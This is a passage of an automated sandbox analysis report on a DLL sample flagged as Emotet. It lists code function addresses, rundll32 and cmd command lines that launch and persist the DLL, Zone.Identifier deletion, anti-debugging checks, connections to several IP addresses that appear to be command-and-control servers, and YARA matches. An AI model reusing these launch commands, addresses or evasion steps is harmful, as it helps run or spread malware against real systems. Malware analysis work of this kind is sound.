                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100055E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100203F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10015220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10002043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10003845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100178A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100144AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10005AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10017ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100208D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100030F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10020B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10009384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10012FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10014BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10006FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100055E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100203F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10004C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10008C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10001A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10011C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10009E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10021A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10002A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10002654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10009A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10001C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10007283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10020687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10014E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10003C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100190BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100198BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10010ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10003502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10002309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10005923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10006B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1002292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10021343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10003345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10003F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10011F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10014D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10004F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10021193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10019DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100143B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10017BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_100225C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1000A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F31D020 appears 48 times
                      Source: qrb6jVwzoe.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qrb6jVwzoe.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: classification engineClassification label: mal92.troj.evad.winDLL@20/7@0/22
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10011B54 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\7ce3e80173264ea19b05306b865eadf9
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: qrb6jVwzoe.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: qrb6jVwzoe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: qrb6jVwzoe.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: qrb6jVwzoe.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: qrb6jVwzoe.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: qrb6jVwzoe.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: qrb6jVwzoe.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F30C7C9 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F30BAD4 push ebx; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F30AD03 push esi; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F30CDEB push esp; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F305DD9 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31D066 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F309C81 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F30C7C9 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F30BAD4 push ebx; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F30AD03 push esi; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F30CDEB push esp; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F305DD9 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31D066 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F309C81 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10001229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10001229 push eax; retf
                      Source: qrb6jVwzoe.dllStatic PE information: section name: .flat
                      Source: qrb6jVwzoe.dllStatic PE information: real checksum: 0x748e8 should be: 0x74470
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhcJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wageozwapqd\lwcebmbtifvqy.ywx:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 1864Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1916Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6648Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F32188A FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F32188A FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10011A80 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 00000015.00000002.859882550.0000015DEBE60000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: svchost.exe, 00000010.00000002.487907364.00000283AAA70000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.488027417.00000283AAAE3000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.488035561.00000283AAAEF000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859853416.0000015DEBE4A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000015.00000002.859453634.0000015DE6829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31BB30 GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,SetLastError,HeapFree,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31F416 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F3214AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31F416 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F3214AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_1001DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31C66F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31CEA2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31C66F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31CEA2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 196.44.98.190 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.79.33.48 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 168.197.250.14 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 177.72.80.14 168
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                      Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31D07B cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31CAD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.fa6a40.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.f66ce0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.f66ce0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.fa6a40.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.c16c78.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.c16c78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp, type: MEMORY
